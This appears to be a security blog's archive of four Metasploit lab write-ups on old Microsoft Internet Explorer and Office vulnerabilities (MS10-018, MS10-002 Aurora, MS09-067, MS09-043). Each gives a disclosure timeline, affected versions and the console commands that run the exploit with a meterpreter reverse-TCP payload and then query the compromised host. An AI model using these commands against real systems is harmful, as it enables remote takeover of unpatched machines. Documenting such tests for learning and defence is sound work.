Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption

Exploits, Metasploit,

Timeline :

Vulnerability privately disclosed to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB980182” provided the 2010-03-30
Metasploit PoC provided by jduck the 2010-04-05

PoC provided by :

Anonymous
jduck

Reference(s) :

CVE-2010-0805
MS10-018

Affected version(s) :

Internet Explorer 5
Internet Explorer 6

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the “DataURL” parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.

Commands :

use windows/browser/ms10_018_ie_tabular_acti­vex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-002 : Internet Explorer Aurora Memory Corruption

Exploits, Metasploit,

Timeline :

Vulnerability learned by Microsoft the 2010-01-13
Metasploit PoC provided by hdm the 2010-01-15
Exploit-DB PoC provided by Ahmed Obied the 2010-01-17
Microsoft patch “KB978207” provided the 2010-01-21

PoC provided by :

unknown
hdm

Reference(s) :

CVE-2010-0249
MS10-002

Affected version(s) :

Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB978207

Description :

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the Operation Aurora attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.

Commands :

use exploit/windows/browser/ms10_002_aurora
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS09-067 : Microsoft Excel Malformed FEATHEADER Record Vulnerability

Exploits, Metasploit,

Timeline :

Vulnerability reported to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB973475” provided the 2009-11-10
Metasploit PoC provided by hdm the 2010-02-12
Exploit-DB PoC provided by anonymous the 2010-08-21

PoC provided by :

Sean Larsson
jduck

Reference(s) :

CVE-2009-3129
MS09-067

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
2007 Microsoft Office System SP1 & SP2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer SP1 & SP2
Microsoft Office Excel Viewer 2003 SP3

Tested on Windows XP SP3 with :

Office Excel 2003 SP3 before KB973475

Description :

This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code exection. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.

Commands :

use exploit/windows/fileformat/ms09_067_exce­l_featheader
set OUTPUTPATH /home/eromang
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

MS09-043 : Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption

Exploits, Metasploit,

Timeline :

Vulnerability reported to Microsoft by ZDI the 2007-03-19
Metasploit PoC provided by hdm the 2009-07-13
Milw0rm PoC provided by anonymous the 2009-07-16
Microsoft patch “KB947319” provided the 2009-08-11

PoC provided by :

unknown
hdm
Ahmed Obied
DSR

Reference(s) :

CVE-2009-1136
MS09-043

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2000 Web Components SP3
Microsoft Office XP Web Components SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2003 Web Components SP1 for the 2007 Microsoft Office System
Microsoft Internet Security and Acceleration Server 2004 Standard Edition SP3
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition SP3
Microsoft Internet Security and Acceleration Server 2006 Standard Edition SP1
Microsoft Internet Security and Acceleration Server 2006 Enterprise Edition SP1
Microsoft BizTalk Server 2002
Microsoft Visual Studio .NET 2003 SP1
Microsoft Office Small Business Accounting 2006

Tested on Windows XP SP3 with :

Office 2003 SP3 before KB947319

Description :

This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild.

Commands :

use exploit/windows/browser/ms09_043_owc_msd­so
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig